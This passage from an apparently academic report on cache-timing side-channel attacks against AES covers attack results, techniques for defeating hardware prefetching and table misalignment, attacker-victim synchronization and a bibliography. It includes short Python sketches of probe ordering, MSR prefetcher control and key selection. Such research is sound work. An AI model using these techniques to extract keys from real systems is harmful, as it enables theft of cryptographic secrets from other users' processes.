Till now, we were assuming ideal cases, with the additional accesses acting as
spurious accesses that decrease the probability. We now compare each of the
results (pre-fetching enabled and disabled) in both an ideal environment and a
noisy environment with some cache lines deliberately made false. This
corresponds to the real scenario, where a few accesses may be missed.
Figure 10.8: Encryptions required for the second round attack (pre-fetching disabled).
Figure 10.9: Encryptions required for the second round attack (pre-fetching enabled).
We can clearly see that the encryptions required for the second round attack are
far more (on the order of thousands) than for the first round attack (on the
order of hundreds).
5. Also, while getting actual accesses from the cache, we have achieved very
high accuracy (more than 95%) with our own set of tables.
To set up this environment, we created one big shared table simulating the
actual AES tables. The victim process continuously accesses random entries
in the table, thus loading them into the cache. The attacker process is able to
retrieve more than 95% of the accesses made by the victim in one time quantum
(which is around 31-32 accesses).
When applying this to the actual AES tables, the accuracy drops drastically to
about 70%. This will affect our results considerably. Finding a solution to this
problem is within the scope of the second stage.
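The key-selection rule used in point 4 above, accepting the top-scoring candidate only when it is clearly separated from the runner-up, can be sketched as follows. The function name and the margin parameter are illustrative, not taken from the attack code.

```python
def best_key_if_clear(scores, min_gap):
    """scores maps each of the 2^16 candidate nibble combinations to its
    score. Return the top candidate only when it beats the second-highest
    score by at least min_gap; otherwise return None, meaning more
    encryptions are needed before committing to a key."""
    ranked = sorted(scores.items(), key=lambda kv: kv[1], reverse=True)
    (best, s1), (_, s2) = ranked[0], ranked[1]
    return best if s1 - s2 >= min_gap else None
```

Running more encryptions widens the gap between the correct combination and the runner-up, so the function eventually commits to a single candidate.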
Chapter 11
Countermeasures
While performing our attacks, we faced many hurdles, which we crossed with
suitable tactics. Following are some of the major problems we faced and
their solutions.
11.1 Pre-fetching
Pre-fetching (specifically, hardware pre-fetching) is used in modern Intel
machines to speed up program execution by reducing wait states. When the
CPU requests a memory location, it is first looked up in the cache. In case of a
cache miss, the data at that particular memory location, along with the adjacent
memory locations in the same block (of the size of a cache block), is fetched
into the cache.
It is assumed that if a process is reading data from some part of memory, it
is most likely to read data from nearby memory locations soon (principle of
spatial locality). This is indeed very likely, because in general a process
allocates data together and performs operations on it later. Also, arrays and
similar structures are accessed at contiguous locations.
Extending the same concept, the hardware pre-fetcher also fetches the block next
to the currently requested block into the cache, assuming that the next block is
likely to be needed in the near future, thus reducing the penalty of cache misses.
Modern processors support 4 types of hardware prefetchers for prefetching data:
2 prefetchers associated with the L1 data cache (also known as the DCU) and 2
associated with the L2 cache. Every core has a Model Specific Register (MSR) at
address 0x1A4 that can be used to control these 4 prefetchers. Bits 0-3 of this
register enable or disable them; the other bits of this MSR are reserved.
Figure 11.1: Intel MSR Prefetcher.
If any of the above bits is set to 1 on a core, then that particular prefetcher
on that core is disabled. Clearing the bit (setting it to 0) enables the
corresponding prefetcher. Note that this MSR is present in every core, and
changes made to the MSR of one core impact the prefetchers only on that core. If
hyper-threading is enabled, both hardware threads share the same MSR.
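The corresponding bit manipulation on the 0x1A4 MSR value can be sketched as follows. Writing the register itself requires ring-0 access (e.g. via the Linux msr kernel module and a wrmsr tool); here we only compute the new value under the bit layout stated above, and the function names are our own.

```python
PREFETCH_MASK = 0b1111  # bits 0-3 of MSR 0x1A4 control the four prefetchers

def disable_all_prefetchers(msr_value):
    """Setting a bit to 1 disables the corresponding prefetcher."""
    return msr_value | PREFETCH_MASK

def enable_all_prefetchers(msr_value):
    """Clearing a bit (setting it to 0) re-enables it."""
    return msr_value & ~PREFETCH_MASK
```

Only bits 0-3 are modified; any reserved bits read from the register are preserved unchanged.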
11.1.1 Issues
In our scenario, this feature adversely affects our attack to a great extent.
Two kinds of problems arise; let us discuss them one by one.
1. When the victim performing AES accesses a table entry, not only those
particular 16 entries (the number of entries in one cache block) are fetched, but
also the next 16 entries. Thus the attacker, when trying to gather information
about the cache lines accessed by the victim, will observe more cache lines than
were actually accessed. This increases the noise in our experiments.
2. The same problem occurs on the attacker's side as well. The attacker gathers
information about accessed cache lines by first accessing each cache line and
measuring the time required to access it. With hardware pre-fetching enabled,
this means that when the attacker measures the time for a particular cache line,
the next memory block is also brought into the cache. The attacker thus clearly
misses the opportunity to learn whether the next line was accessed by the victim
or not.
11.1.2 Workaround
To remove the effects of pre-fetching, one way is to disable hardware pre-fetching
in the processor; the steps to do so are described in the appendix. This, however,
is not a realistic approach, because we may never get the chance to disable
hardware pre-fetching in a real scenario. Also, newer architectures do not support
disabling pre-fetching.
Moreover, pre-fetching is essential to the performance of the system, so this
step is not at all justified.
We thus propose the following approaches to curb the pre-fetching effects.
• Instead of accessing the cache lines in sequential order one after another,
access them such that there is a difference of at least two lines between
consecutive accesses. This removes the effect of the simple hardware pre-fetcher,
because it only fetches the next line in memory.
However, there is another problem: accesses made in this fashion can be detected
by more sophisticated modern-day pre-fetchers, which look for a stride in the
memory accesses. That is, if we try to access the cache lines with a gap of 2
(for example, the 6th line, the 8th line, the 10th line), the stride pre-fetcher
brings in the next line (the 12th line, in this case).
To nullify such effects, we further propose the following: access the cache
lines in some definite but random-looking order, so that the effects of both the
adjacent-line and the stride pre-fetcher are removed.
Here, we have generated numbers using the principles of a cyclic group, taking
the generator to be 2 and the prime modulus to be 37.
So, at each step the line offset accessed can be represented by this equation:

n = ((2^i) mod 37) * 2,

where i is the ith iteration of this sequence.
The series of powers generated is: 2, 4, 8, 16, ...
Since 2 is a primitive root modulo 37, the powers 2^i mod 37 take every value
from 1 to 36 exactly once, in an order that appears sufficiently random to naive
stride pre-fetchers. Each time we access twice the generated number, so that
only even lines are accessed.
This clearly helps us in gathering the cache access patterns.
• There is now only one problem left with this approach: what happens to the
odd cache lines? Accessing only the even cache lines every time, and ignoring
the odd ones, would mean missing the opportunity to detect those. For that, we
propose the following.
In one cycle access the even lines, and in the next cycle access the odd lines,
i.e. alternate between even and odd lines. This will certainly miss some of the
accesses in any particular iteration, but it allows us not to miss the
information on the other lines altogether. The probability of getting the correct
key from a single run is reduced, but a larger number of encryptions during the
online phase of the attack will let us retrieve the key with high accuracy.
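The cyclic-group access order described in the first point can be sketched as follows. Mapping the doubled residues onto cache-line offsets is our reading of the construction; the function name is hypothetical.

```python
def probe_order():
    """Even line offsets in the pseudo-random order 2 * (2^i mod 37).
    Since 2 is a primitive root modulo 37, the residues 2^i mod 37 for
    i = 0..35 take every value 1..36 exactly once, so the doubled values
    cover every even offset from 2 to 72 exactly once."""
    return [2 * pow(2, i, 37) for i in range(36)]
```

Consecutive entries differ by irregular strides (double or wrap around 37), so neither an adjacent-line nor a fixed-stride pre-fetcher can track the pattern.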
11.2 Look-up tables Misalignment
Misalignment of the lookup tables was another problem that we faced in the
initial stages, but it was observed only with some operating systems.
In the ideal case, each cache line is 64 bytes and one table is 1KB. So, if we
consider the scenario where the table's entries start at the beginning of a cache
line, there is no misalignment: since each lookup-table entry is 4 bytes, there
are exactly 16 entries in each cache line.
But in some OS versions we found that the table entries do not start at the
beginning of a cache line, creating a misalignment problem. The result is
obvious: if cache line x is accessed, then x + 1 is observed as well.
The solution to the above problem is to write a program that checks for the
misalignment; in the misaligned case, the exactly next entry must also be
checked, as the observed index is increased by 1.
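The misalignment check can be sketched as follows, assuming 64-byte cache lines and 4-byte table entries as above; the function names are our own.

```python
LINE = 64  # bytes per cache line

def is_misaligned(table_base):
    """True when the table does not start at a cache-line boundary."""
    return table_base % LINE != 0

def observed_lines(logical_line, table_base):
    """Cache lines a logical table line may show up as: the line itself,
    plus the next one when the table straddles line boundaries."""
    if is_misaligned(table_base):
        return [logical_line, logical_line + 1]
    return [logical_line]
```

In the misaligned case the spy simply treats an observation of line x + 1 as evidence for logical line x as well.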
11.3 Synchronization
Achieving synchronization in our espionage infrastructure was another challenge,
which we handled in an iterative manner. The first problem we faced was
developing an efficient algorithm for communication between two processes
residing on different cores.
We first implemented a two-way signalling methodology, but its drawback was that
it took too much time to send and receive signals, giving the victim enough time
to perform multiple AES encryptions.
This problem was later solved by employing a one-way signalling mechanism: we
update a shared variable between the two processes, and only process 2 sends a
signal to process 1. This was efficient with respect to time. Later, to improve
our algorithm further, we added the delays δ1 and δ2 introduced in Section 8.2.
Bibliography
[1] OpenSSL. https://www.openssl.org.
[2] Wikipedia: Advanced Encryption Standard. http://en.wikipedia.org/wiki/
Advanced_Encryption_Standard. Modified: 2015-05-07.
[3] Onur Acıicmez and Cetin Kaya Koc. Trace-driven cache attacks on AES (short
paper). In Information and Communications Security, pages 112–121. Springer,
2006.
[4] Vibhor Agrawal. Cache based side channel attacks. Technical Report 38-41,
Department of Computer Science & Engineering, IIT-Bombay, India, 2014.
[5] Daniel J. Bernstein. Cache-timing attacks on AES, 2005.
[6] Joan Daemen and Vincent Rijmen. The Design of Rijndael: AES, the Advanced
Encryption Standard. Springer, 2002.
[7] Eran Tromer, Dag Arne Osvik, and Adi Shamir. Efficient cache attacks on AES,
and countermeasures. Journal of Cryptology, 23(1):37–71, 2010.
[8] Gorka Irazoqui, Mehmet Sinan Inci, Thomas Eisenbarth, and Berk Sunar. Wait a
minute! A fast, cross-VM attack on AES. In Research in Attacks, Intrusions and
Defenses, pages 299–319. Springer, 2014.
[9] Jyoti Gajrani, Pooja Mazumdar, Sampreet Sharma, and Bernard Menezes.
Challenges in implementing cache-based side channel attacks on modern
processors. In 27th International Conference on VLSI Design and 13th
International Conference on Embedded Systems. IEEE, 2014.
[10] Gorka Irazoqui Apecechea. Fine grain cross-VM attacks on Xen and VMware are
possible! IACR Cryptology ePrint Archive, page 248, 2014.
[11] David Gullasch, Endre Bangerter, and Stephan Krenn. Cache Games: bringing
access-based cache attacks on AES to practice. In Security and Privacy (SP),
2011 IEEE Symposium on, pages 490–505. IEEE, 2011.
[12] W.-M. Hu. Lattice scheduling and covert channels. In Proceedings of the
IEEE Symposium on Security and Privacy (SP '92), Washington, DC, USA. IEEE
Computer Society, 1992.
[13] Joseph Bonneau and Ilya Mironov. Cache-collision timing attacks against
AES. In Cryptographic Hardware and Embedded Systems (CHES 2006), volume 4249 of
Springer LNCS, pages 201–215. Springer, 2006.
[14] Michael Neve and Jean-Pierre Seifert. Advances on access-driven cache
attacks on AES. In Selected Areas in Cryptography, pages 147–162. Springer, 2007.
[15] M. Weiß, B. Heinz, and F. Stumpf. A cache timing attack on AES in
virtualization environments. In Financial Cryptography and Data Security, pages
314–328. Springer, 2012.
[16] Dag Arne Osvik, Adi Shamir, and Eran Tromer. Cache attacks and
countermeasures: the case of AES. In Topics in Cryptology (CT-RSA 2006), pages
1–20. Springer, 2006.
[17] Y. Tsunoo, T. Saito, T. Suzaki, and M. Shigeri. Cryptanalysis of DES
implemented on computers with cache. In Proc. of CHES 2003, Springer LNCS, pages
62–76. Springer-Verlag, 2003.
[18] Yuval Yarom and Katrina E. Falkner. Flush+Reload: a high resolution, low
noise, L3 cache side-channel attack. IACR Cryptology ePrint Archive, 2013:448,
2013.